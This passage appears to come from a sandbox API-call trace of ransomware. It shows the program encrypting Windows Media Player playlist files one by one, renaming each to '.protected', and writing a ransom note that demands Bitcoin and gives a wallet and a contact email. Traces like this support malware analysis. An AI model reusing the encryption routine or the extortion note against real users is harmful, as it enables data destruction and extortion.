lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0085.051] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0085.051] CloseHandle (hObject=0x158) returned 1 [0085.051] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl.protected") returned 145 [0085.051] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl.protected")) returned 1 [0085.052] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0085.052] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="Windows") returned -1 [0085.052] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="Program Files") returned -1 [0085.052] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="Program Files (x86)") returned -1 [0085.052] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="$Recycle.bin") returned 1 [0085.052] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2="System Volume Information") returned -1 [0085.052] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl") returned 129 [0085.052] StrStrIW (lpFirst="09_Music_played_the_most.wpl", lpSrch=".protected") returned 0x0 [0085.052] lstrcmpW (lpString1="09_Music_played_the_most.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0085.052] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0085.052] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0085.052] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0085.053] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl") returned 129 [0085.053] StrStrW (lpFirst="09_Music_played_the_most.wpl", lpSrch=".txt") returned 0x0 [0085.053] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl") returned 129 [0085.053] StrStrW (lpFirst="09_Music_played_the_most.wpl", lpSrch=".rar") returned 0x0 [0085.053] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl") returned 129 [0085.053] StrStrW (lpFirst="09_Music_played_the_most.wpl", lpSrch=".zip") returned 0x0 [0085.053] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x401, lpOverlapped=0x0) returned 1 [0085.054] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.054] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x401, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x401, lpOverlapped=0x0) returned 1 [0085.055] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.055] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0085.055] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0085.055] CloseHandle (hObject=0x158) returned 1 [0085.055] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl.protected") returned 139 [0085.055] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl.protected")) returned 1 [0085.056] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0085.056] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="Windows") returned -1 [0085.056] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="Program Files") returned -1 [0085.056] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="Program Files (x86)") returned -1 [0085.056] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="$Recycle.bin") returned 1 [0085.056] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2="System Volume Information") returned -1 [0085.056] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl") returned 117 [0085.056] StrStrIW (lpFirst="10_All_Music.wpl", lpSrch=".protected") returned 0x0 [0085.056] lstrcmpW (lpString1="10_All_Music.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0085.056] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0085.056] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0085.056] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0085.057] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl") returned 117 [0085.057] StrStrW (lpFirst="10_All_Music.wpl", lpSrch=".txt") returned 0x0 [0085.057] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl") returned 117 [0085.057] StrStrW (lpFirst="10_All_Music.wpl", lpSrch=".rar") returned 0x0 [0085.057] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl") returned 117 [0085.057] StrStrW (lpFirst="10_All_Music.wpl", lpSrch=".zip") returned 0x0 [0085.057] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x427, lpOverlapped=0x0) returned 1 [0085.062] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbd9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.062] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x427, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x427, lpOverlapped=0x0) returned 1 [0085.062] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.063] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0085.063] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0085.063] CloseHandle (hObject=0x158) returned 1 [0085.063] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl.protected") returned 127 [0085.063] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl.protected")) returned 1 [0085.064] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0085.064] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="Windows") returned -1 [0085.064] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="Program Files") returned -1 [0085.064] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="Program Files (x86)") returned -1 [0085.064] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="$Recycle.bin") returned 1 [0085.064] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2="System Volume Information") returned -1 [0085.064] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl") returned 120 [0085.064] StrStrIW (lpFirst="11_All_Pictures.wpl", lpSrch=".protected") returned 0x0 [0085.064] lstrcmpW (lpString1="11_All_Pictures.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0085.064] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0085.064] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0085.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0085.065] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl") returned 120 [0085.065] StrStrW (lpFirst="11_All_Pictures.wpl", lpSrch=".txt") returned 0x0 [0085.065] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl") returned 120 [0085.065] StrStrW (lpFirst="11_All_Pictures.wpl", lpSrch=".rar") returned 0x0 [0085.065] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl") returned 120 [0085.065] StrStrW (lpFirst="11_All_Pictures.wpl", lpSrch=".zip") returned 0x0 [0085.065] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x249, lpOverlapped=0x0) returned 1 [0085.066] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffdb7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.066] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x249, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x249, lpOverlapped=0x0) returned 1 [0085.067] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.067] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0085.067] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0085.067] CloseHandle (hObject=0x158) returned 1 [0085.067] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl.protected") returned 130 [0085.067] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl.protected")) returned 1 [0085.068] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0085.068] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="Windows") returned -1 [0085.068] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="Program Files") returned -1 [0085.068] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="Program Files (x86)") returned -1 [0085.068] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="$Recycle.bin") returned 1 [0085.068] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2="System Volume Information") returned -1 [0085.068] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl") returned 117 [0085.068] StrStrIW (lpFirst="12_All_Video.wpl", lpSrch=".protected") returned 0x0 [0085.068] lstrcmpW (lpString1="12_All_Video.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0085.068] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0085.068] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0085.068] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0085.068] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl") returned 117 [0085.068] StrStrW (lpFirst="12_All_Video.wpl", lpSrch=".txt") returned 0x0 [0085.068] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl") returned 117 [0085.068] StrStrW (lpFirst="12_All_Video.wpl", lpSrch=".rar") returned 0x0 [0085.069] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl") returned 117 [0085.069] StrStrW (lpFirst="12_All_Video.wpl", lpSrch=".zip") returned 0x0 [0085.069] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x437, lpOverlapped=0x0) returned 1 [0085.070] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbc9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.070] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x437, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x437, lpOverlapped=0x0) returned 1 [0085.070] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.070] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0085.070] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0085.070] CloseHandle (hObject=0x158) returned 1 [0085.071] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl.protected") returned 127 [0085.071] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl.protected")) returned 1 [0085.071] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0085.071] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0085.071] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\RESTORE_FILES.txt") returned 118 [0085.071] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0085.072] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.072] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0085.073] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.073] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0085.073] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.073] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0085.073] CloseHandle (hObject=0x154) returned 1 [0085.073] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0085.073] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0085.073] 